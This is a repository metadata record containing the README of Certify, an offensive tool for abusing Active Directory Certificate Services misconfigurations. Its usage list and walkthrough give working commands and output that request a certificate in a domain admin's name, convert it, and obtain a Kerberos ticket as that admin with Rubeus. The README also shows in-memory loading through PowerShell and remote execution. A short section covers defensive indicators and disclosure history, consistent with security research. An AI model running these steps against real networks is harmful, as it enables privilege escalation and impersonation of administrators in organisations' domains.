{"id":15035834,"url":"https://github.com/ghostpack/certify","last_synced_at":"2025-05-15T13:05:38.815Z","repository":{"id":37837714,"uuid":"375499983","full_name":"GhostPack/Certify","owner":"GhostPack","description":"Active Directory certificate abuse.","archived":false,"fork":false,"pushed_at":"2024-08-12T13:04:04.000Z","size":166,"stargazers_count":1664,"open_issues_count":26,"forks_count":230,"subscribers_count":29,"default_branch":"main","last_synced_at":"2025-05-15T13:05:29.757Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GhostPack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-06-09T22:03:30.000Z","updated_at":"2025-05-13T05:22:10.000Z","dependencies_parsed_at":"2025-01-09T19:32:19.731Z","dependency_job_id":"3efd2b32-13bf-40c8-b08e-6001939db087","html_url":"https://github.com/GhostPack/Certify","commit_stats":{"total_commits":22,"total_committers":11,"mean_commits":2.0,"dds":0.7272727272727273,"last_synced_commit":"a2d230f607217b7b567d82ec7abb663311352131"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostPack%2FCertify","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostPack%2FCertify/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostPack%2FCertify/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostPack%2FCertify/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GhostPack","download_url":"https://codeload.github.com/GhostPack/Certify/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254346624,"owners_count":22055808,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-09-24T20:29:35.247Z","updated_at":"2025-05-15T13:05:38.771Z","avatar_url":"https://github.com/GhostPack.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Certify\n\nCertify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\n\n[@harmj0y](https://twitter.com/harmj0y) and [@tifkin_](https://twitter.com/tifkin_) are the primary authors of Certify and the the associated AD CS research ([blog](https://posts.specterops.io/certified-pre-owned-d95910965cd2) and [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf)).\n\n## Table of Contents\n- [Certify](#certify)\n  - [Usage](#usage)\n    - [Using Requested Certificates](#using-requested-certificates)\n  - [Example Walkthrough](#example-walkthrough)\n  - [Defensive Considerations](#defensive-considerations)\n  - [Compile Instructions](#compile-instructions)\n    - [Sidenote: Running Certify Through PowerShell](#sidenote-running-certify-through-powershell)\n      - [Sidenote Sidenote: Running Certify Over PSRemoting](#sidenote-sidenote-running-certify-over-psremoting)\n  - [Reflections](#reflections)\n  - [Acknowledgments](#acknowledgments)\n\n\n## Usage\n\n    C:\\Tools\u003eCertify.exe\n\n       _____          _   _  __\n      / ____|        | | (_)/ _|\n     | |     ___ _ __| |_ _| |_ _   _\n     | |    / _ \\ '__| __| |  _| | | |\n     | |___|  __/ |  | |_| | | | |_| |\n      \\_____\\___|_|   \\__|_|_|  \\__, |\n                                 __/ |\n                                |___./\n      v1.0.0\n\n\n      Find information about all registered CAs:\n\n        Certify.exe cas [/ca:SERVER\\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet]\n\n\n      Find all enabled certificate templates:\n\n        Certify.exe find [/ca:SERVER\\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]\n\n      Find vulnerable/abusable certificate templates using default low-privileged groups:\n\n        Certify.exe find /vulnerable [/ca:SERVER\\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]\n\n      Find vulnerable/abusable certificate templates using all groups the current user context is a part of:\n\n        Certify.exe find /vulnerable /currentuser [/ca:SERVER\\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]\n\n      Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled:\n\n        Certify.exe find /enrolleeSuppliesSubject [/ca:SERVER\\ca-name| /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]\n\n      Find enabled certificate templates capable of client authentication:\n\n        Certify.exe find /clientauth [/ca:SERVER\\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]\n\n      Find all enabled certificate templates, display all of their permissions, and don't display the banner message:\n\n        Certify.exe find /showAllPermissions /quiet [/ca:COMPUTER\\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]\n\n      Find all enabled certificate templates and output to a json file:\n\n        Certify.exe find /json /outfile:C:\\Temp\\out.json [/ca:COMPUTER\\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]\n\n\n      Enumerate access control information for PKI objects:\n\n        Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet]\n\n\n      Request a new certificate using the current user context:\n\n        Certify.exe request /ca:SERVER\\ca-name [/subject:X] [/template:Y] [/install]\n\n      Request a new certificate using the current machine context:\n\n        Certify.exe request /ca:SERVER\\ca-name /machine [/subject:X] [/template:Y] [/install]\n\n      Request a new certificate using the current user context but for an alternate name (if supported):\n\n        Certify.exe request /ca:SERVER\\ca-name /template:Y /altname:USER\n\n      Request a new certificate using the current user context but for an alternate name and SID (if supported):\n\n        Certify.exe request /ca:SERVER\\ca-name /template:Y /altname:USER /sid:S-1-5-21-2697957641-2271029196-387917394-2136\n\n      Request a new certificate using the current user context but for an alternate name and URL (if supported):\n\n        Certify.exe request /ca:SERVER\\ca-name /template:Y /altname:USER /url:tag:microsoft.com,2022-09-14:sid:S-1-5-21-2697957641-2271029196-387917394-2136\n\n      Request a new certificate on behalf of another user, using an enrollment agent certificate:\n\n        Certify.exe request /ca:SERVER\\ca-name /template:Y /onbehalfof:DOMAIN\\USER /enrollcert:C:\\Temp\\enroll.pfx [/enrollcertpw:CERT_PASSWORD]\n\n\n      Download an already requested certificate:\n\n        Certify.exe download /ca:SERVER\\ca-name /id:X [/install] [/machine]\n\n\n\n    Certify completed in 00:00:00.0200190\n\n\n### Using Requested Certificates\n\nCertificates can be transformed to .pfx's usable with Certify with:\n\n    openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx\n\nCertificates can be used with Rubeus to request a TGT with:\n\n    Rubeus.exe asktgt /user:X /certificate:C:\\Temp\\cert.pfx /password:\u003cCERT_PASSWORD\u003e\n\n\n## Example Walkthrough\n\nFirst, use Certify.exe to see if there are any vulnerable templates:\n\n    C:\\Temp\u003eCertify.exe find /vulnerable\n       _____          _   _  __\n      / ____|        | | (_)/ _|\n     | |     ___ _ __| |_ _| |_ _   _\n     | |    / _ \\ '__| __| |  _| | | |\n     | |___|  __/ |  | |_| | | | |_| |\n      \\_____\\___|_|   \\__|_|_|  \\__, |\n                                 __/ |\n                                |___./\n      v1.0.0\n\n    [*] Action: Find certificate templates\n    [*] Using the search base 'CN=Configuration,DC=theshire,DC=local'\n    [*] Restricting to CA name : dc.theshire.local\\theshire-DC-CA\n\n    [*] Listing info about the Enterprise CA 'theshire-DC-CA'\n\n        Enterprise CA Name            : theshire-DC-CA\n        DNS Hostname                  : dc.theshire.local\n        FullName                      : dc.theshire.local\\theshire-DC-CA\n        Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED\n        Cert SubjectName              : CN=theshire-DC-CA, DC=theshire, DC=local\n        Cert Thumbprint               : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2\n        Cert Serial                   : 14BFC25F2B6EEDA94404D5A5B0F33E21\n        Cert Start Date               : 1/4/2021 10:48:02 AM\n        Cert End Date                 : 1/4/2026 10:58:02 AM\n        Cert Chain                    : CN=theshire-DC-CA,DC=theshire,DC=local\n        UserSpecifiedSAN              : Disabled\n        CA Permissions                :\n          Owner: BUILTIN\\Administrators        S-1-5-32-544\n\n          Access Rights                                     Principal\n\n          Allow  ManageCA, ManageCertificates               BUILTIN\\Administrators        S-1-5-32-544\n          Allow  ManageCA, ManageCertificates               THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n          Allow  ManageCA, Read, Enroll                     THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n            [!] Low-privileged principal has ManageCA rights!\n          Allow  Enroll                                     THESHIRE\\Domain Computers     S-1-5-21-937929760-3187473010-80948926-515\n          Allow  ManageCA, ManageCertificates               THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n          Allow  ManageCertificates, Enroll                 THESHIRE\\certmanager          S-1-5-21-937929760-3187473010-80948926-1605\n          Allow  ManageCA, Enroll                           THESHIRE\\certadmin            S-1-5-21-937929760-3187473010-80948926-1606\n        Enrollment Agent Restrictions :\n          Everyone                      S-1-1-0\n            Template : \u003cAll\u003e\n            Targets  :\n              Everyone                  S-1-1-0\n\n          Everyone                      S-1-1-0\n            Template : User\n            Targets  :\n              Everyone                  S-1-1-0\n\n    Vulnerable Certificates Templates :\n\n        CA Name                         : dc.theshire.local\\theshire-DC-CA\n        Template Name                   : User2\n        Validity Period                 : 2 years\n        Renewal Period                  : 6 weeks\n        msPKI-Certificates-Name-Flag    : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH\n        mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENT\n        Authorized Signatures Required  : 0\n        pkiextendedkeyusage             : Client Authentication, Smart Card Logon\n        Permissions\n          Enrollment Permissions\n            Enrollment Rights           : THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n            All Extended Rights         : THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n          Object Control Permissions\n            Owner                       : THESHIRE\\localadmin           S-1-5-21-937929760-3187473010-80948926-1000\n            Full Control Principals     : THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n            WriteOwner Principals       : NT AUTHORITY\\Authenticated UsersS-1-5-11\n                                          THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n            WriteDacl Principals        : NT AUTHORITY\\Authenticated UsersS-1-5-11\n                                          THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n            WriteProperty Principals    : NT AUTHORITY\\Authenticated UsersS-1-5-11\n                                          THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n\n        CA Name                         : dc.theshire.local\\theshire-DC-CA\n        Template Name                   : VulnTemplate\n        Validity Period                 : 3 years\n        Renewal Period                  : 6 weeks\n        msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT\n        mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS\n        Authorized Signatures Required  : 0\n        pkiextendedkeyusage             : Client Authentication, Encrypting File System, Secure Email\n        Permissions\n          Enrollment Permissions\n            Enrollment Rights           : THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Domain Users         S-1-5-21-937929760-3187473010-80948926-513\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n          Object Control Permissions\n            Owner                       : THESHIRE\\localadmin           S-1-5-21-937929760-3187473010-80948926-1000\n            WriteOwner Principals       : THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n                                          THESHIRE\\localadmin           S-1-5-21-937929760-3187473010-80948926-1000\n            WriteDacl Principals        : THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n                                          THESHIRE\\localadmin           S-1-5-21-937929760-3187473010-80948926-1000\n            WriteProperty Principals    : THESHIRE\\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512\n                                          THESHIRE\\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519\n                                          THESHIRE\\localadmin           S-1-5-21-937929760-3187473010-80948926-1000\n\n\n\n    Certify completed in 00:00:00.6548319\n\nGiven the above results, we have the three following issues:\n\n1. `THESHIRE\\Domain Users` have **ManageCA** permissions over the `dc.theshire.local\\theshire-DC-CA` CA (ESC7)\n   * This means that the EDITF_ATTRIBUTESUBJECTALTNAME2 flag can be flipped on the CA by anyone.\n2. `THESHIRE\\Domain Users` have full control over the **User2** template (ESC4)\n   * This means that anyone can flip the **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT** flag on this template and remove the **PEND_ALL_REQUESTS** issuance requirement.\n3. `THESHIRE\\Domain Users` can enroll in the **VulnTemplate** template, which can be used for client authentication and has ENROLLEE_SUPPLIES_SUBJECT set (ESC1)\n   * This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA).\n\nWe'll show the abuse of scenario 3.\n\nNext, let's request a new certificate for this template/CA, specifying a DA `localadmin` as the alternate principal:\n\n    C:\\Temp\u003eCertify.exe request /ca:dc.theshire.local\\theshire-DC-CA /template:VulnTemplate /altname:localadmin\n\n       _____          _   _  __\n      / ____|        | | (_)/ _|\n     | |     ___ _ __| |_ _| |_ _   _\n     | |    / _ \\ '__| __| |  _| | | |\n     | |___|  __/ |  | |_| | | | |_| |\n      \\_____\\___|_|   \\__|_|_|  \\__, |\n                                 __/ |\n                                |___./\n      v1.0.0\n\n    [*] Action: Request a Certificates\n\n    [*] Current user context    : THESHIRE\\harmj0y\n    [*] No subject name specified, using current context as subject.\n\n    [*] Template                : VulnTemplate\n    [*] Subject                 : CN=harmj0y, OU=TestOU, DC=theshire, DC=local\n    [*] AltName                 : localadmin\n\n    [*] Certificate Authority   : dc.theshire.local\\theshire-DC-CA\n\n    [*] CA Response             : The certificate had been issued.\n    [*] Request ID              : 337\n\n    [*] cert.pem         :\n\n    -----BEGIN RSA PRIVATE KEY-----\n    MIIEpAIBAAKCAQEAn8bKuwCYj8...\n    -----END RSA PRIVATE KEY-----\n    -----BEGIN CERTIFICATE-----\n    MIIGITCCBQmgAwIBAgITVQAAAV...\n    -----END CERTIFICATE-----\n\n\n    [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx\n\n\n\n    Certify completed in 00:00:04.2127911\n\n\nCopy the ` -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE-----` section to a file on Linux/macOS, and run the openssl command to convert it to a .pfx. When prompted, don't enter a password:\n\n    (base) laptop:~ harmj0y$ openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx\n    Enter Export Password:\n    Verifying - Enter Export Password:\n    (base) laptop:~ harmj0y$\n\n\nFinally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the `altname` user using Rubeus:\n\n    C:\\Temp\u003eRubeus.exe asktgt /user:localadmin /certificate:C:\\Temp\\cert.pfx\n\n       ______        _\n      (_____ \\      | |\n       _____) )_   _| |__  _____ _   _  ___\n      |  __  /| | | |  _ \\| ___ | | | |/___)\n      | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n      |_|   |_|____/|____/|_____)____/(___/\n\n      v1.6.1\n\n    [*] Action: Ask TGT\n\n    [*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local\n    [*] Building AS-REQ (w/ PKINIT preauth) for: 'theshire.local\\localadmin'\n    [+] TGT request successful!\n    [*] base64(ticket.kirbi):\n\n          doIFujCCBbagAwIBBaEDAgEWooIExzCC...(snip)...\n\n      ServiceName           :  krbtgt/theshire.local\n      ServiceRealm          :  THESHIRE.LOCAL\n      UserName              :  localadmin\n      UserRealm             :  THESHIRE.LOCAL\n      StartTime             :  2/22/2021 2:06:51 PM\n      EndTime               :  2/22/2021 3:06:51 PM\n      RenewTill             :  3/1/2021 2:06:51 PM\n      Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable\n      KeyType               :  rc4_hmac\n      Base64(key)           :  Etb5WPFWeMbsZr2+FQQQMw==\n\n\n## Defensive Considerations\n\nCertify was released at Black Hat 2021 with our [\"Certified Pre-Owned: Abusing Active Directory Certificate Services\"](https://www.blackhat.com/us-21/briefings/schedule/#certified-pre-owned-abusing-active-directory-certificate-services-23168) talk.\n\nThe [TypeRefHash](https://www.gdatasoftware.com/blog/2020/06/36164-introducing-the-typerefhash-trh) of the current Certify codebase is **f9dbbfe2527e1164319350c0b0900c58be57a46c53ffef31699ed116a765995a**.\n\nThe TypeLib GUID of Certify is **64524ca5-e4d0-41b3-acc3-3bdbefd40c97**. This is reflected in the Yara rules currently in this repo.\n\nSee our [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) for prevention and detection guidance.\n\n\n## Compile Instructions\n\nWe are not planning on releasing binaries for Certify, so you will have to compile yourself :)\n\nCertify has been built against .NET 4.0 and is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Simply open up the project .sln, choose \"Release\", and build.\n\n\n### Sidenote: Running Certify Through PowerShell\n\nIf you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:\n\n    [Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\Certify.exe\")) | Out-File -Encoding ASCII C:\\Temp\\Certify.txt\n\nCertify can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-encoded Certify assembly string):\n\n    $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\n\nThe Main() method and any arguments can then be invoked as follows:\n\n    [Certify.Program]::Main(\"find /vulnerable\".Split())\n\n\n#### Sidenote Sidenote: Running Certify Over PSRemoting\n\nDue to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Certify has a function to help with that.\n\nIf you follow the instructions in [Sidenote: Running Certify Through PowerShell](#sidenote-running-Certify-through-powershell) to create a Certify.ps1, append something like the following to the script:\n\n    [Certify.Program]::MainString(\"find /vulnerable\")\n\nYou should then be able to run Certify over PSRemoting with something like the following:\n\n    $s = New-PSSession dc.theshire.local\n    Invoke-Command -Session $s -FilePath C:\\Temp\\Certify.ps1\n\nAlternatively, Certify's `/outfile:C:\\FILE.txt` argument will redirect all output streams to the specified file.\n\n\n## Reflections\n\nOn the subject of public disclosure, we self-embargoed the release of our offensive tooling (Certify as well as [ForgeCert](https://github.com/GhostPack/ForgeCert)) for ~45 days after we published our [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. We also preemptively released some Yara rules/IOCs for both projects and released the defensive-focused [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit) PowerShell project along with the whitepaper. However, we have found that organizations and vendors have historically often not fixed issues or built detections for \"theoretical\" attacks until someone proves something is possible with a proof of concept.\n\n\n## Acknowledgments\n\nCertify used a few resources found online as reference and inspiration:\n\n* [This post](https://web.archive.org/web/20200131060008/http://geekswithblogs.net/shaunxu/archive/2012/01/13/working-with-active-directory-certificate-service-via-c.aspx) on requesting certificates from C#.\n* [This gist](https://gist.github.com/jimmyca15/8f737f5f0bcf347450bd6d6bf34f4f7e#file-certificate-cs-L86-L101) for SAN specification.\n* [This StackOverflow post](https://stackoverflow.com/a/23739932) on exporting private keys.\n* [This PKISolutions post](https://www.sysadmins.lv/blog-en/how-to-convert-pkiexirationperiod-and-pkioverlapperiod-active-directory-attributes.aspx) on converting pkiExpirationPeriod.\n* [This section of MS-CSRA](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-csra/b497b1e1-a84c-40c8-9379-524193176fad) describing enrollment agent security DACLs.\n\n\nThe AD CS work was built on work from a number of others. The [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) has a complete treatment, but to summarize:\n\n* [Benjamin Delpy](https://twitter.com/gentilkiwi/) for his [extensive work](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files) on smart cards/certificates with Mimikatz and Kekeo.\n* PKI Solutions for their [excellent posts on PKI in Active Directory](https://www.pkisolutions.com/thepkiblog/), as well as their [PSPKI PowerShell module](https://github.com/PKISolutions/PSPKI), which our auditing toolkit is based on.\n* The \"[Windows Server 2008 – PKI and Certificate Security](https://www.microsoftpressstore.com/store/windows-server-2008-pki-and-certificate-security-9780735640788)\" book by Brian Komar.\n* The following open technical specifications provided by Microsoft:\n  * [MS-CERSOD]: Certificate Services Protocols Overview\n  * [MS-CRTD]: Certificate Templates Structure\n  * [MS-CSRA]: Certificate Services Remote Administration Protocol\n  * [MS-ICPR]: ICertPassage Remote Protocol\n  * [MS-WCCE]: Windows Client Certificate Enrollment Protocol\n* [Christoph Falta's GitHub repo](https://github.com/cfalta/PoshADCS) which covers some details on attacking certificate templates, including virtual smart cards as well as some ideas on ACL based abuses.\n* CQURE's \"[The tale of Enhanced Key (mis)Usage](https://cqureacademy.com/blog/enhanced-key-usage)\" post which covers some Subject Alternative Name abuses.\n* Keyfactor's 2016 post \"[Hidden Dangers: Certificate Subject Alternative Names (SANs)](https://www.keyfactor.com/blog/hidden-dangers-certificate-subject-alternative-names-sans/)\"\n* [@Elkement](https://twitter.com/elkement)'s posts \"[Sizzle @ hackthebox – Unintended: Getting a Logon Smartcard for the Domain Admin!](https://elkement.blog/2019/06/01/sizzle-hackthebox-unintended-getting-a-logon-smartcard-for-the-domain-admin-2/)\" and \"[Impersonating a Windows Enterprise Admin with a Certificate: Kerberos PKINIT from Linux](https://elkement.wordpress.com/2020/06/21/impersonating-a-windows-enterprise-admin-with-a-certificate-kerberos-pkinit-from-linux/)\" detail certificate template misconfigurations.\n* Carl Sörqvist wrote up a detailed, and plausible, scenario for how some of these misconfigurations happen titled \"[Supply in the Request Shenanigans](https://blog.qdsecurity.se/2020/09/04/supply-in-the-request-shenanigans/)\".\n* [Ceri Coburn](https://twitter.com/_ethicalchaos_) released an excellent post in 2020 on \"[Attacking Smart Card Based Active Directory Networks](https://ethicalchaos.dev/2020/10/04/attacking-smart-card-based-active-directory-networks/)\" detailing some smart card abuse and Certify additions.\n* Brad Hill published a whitepaper titled \"[Weaknesses and Best Practices of Public Key Kerberos with Smart Cards](https://research.nccgroup.com/wp-content/uploads/2020/07/weaknesses_and_best_practices_of_public_key_kerberos_with_smart_cards.pdf)\" which provided some good background on Kerberos/PKINIT from a security perspective.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fghostpack%2Fcertify","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fghostpack%2Fcertify","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fghostpack%2Fcertify/lists"}